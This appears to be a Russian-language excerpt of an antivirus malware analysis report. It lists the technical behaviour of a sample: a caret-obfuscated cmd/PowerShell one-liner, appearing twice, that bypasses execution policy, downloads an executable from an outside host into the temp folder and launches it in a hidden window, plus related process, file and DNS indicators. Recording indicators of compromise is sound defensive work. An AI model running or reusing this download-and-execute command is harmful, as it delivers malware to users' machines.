Техническая информация
- http://inbox.cefka.com/weat/ как $qyuwd
- '<SYSTEM32>\cmd.exe' /c P^owerSh^ell -ExecutionPolicy ByPass -NoProfile -command $qyuwd=$env:temp+'\yredc.exe';(Ne^w-Objec^t Net.We^bCli^e^nt).DownloadFile('http://inbox.cefka.com/weat/',$qyuwd);Start-Process $qyuw...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1928
- %TEMP%\916833.cvr
- DNS ASK in###.cefka.com
- '<SYSTEM32>\cmd.exe' /c P^owerSh^ell -ExecutionPolicy ByPass -NoProfile -command $qyuwd=$env:temp+'\yredc.exe';(Ne^w-Objec^t Net.We^bCli^e^nt).DownloadFile('http://inbox.cefka.com/weat/',$qyuwd);Start-Process $qyuw...' (со скрытым окном)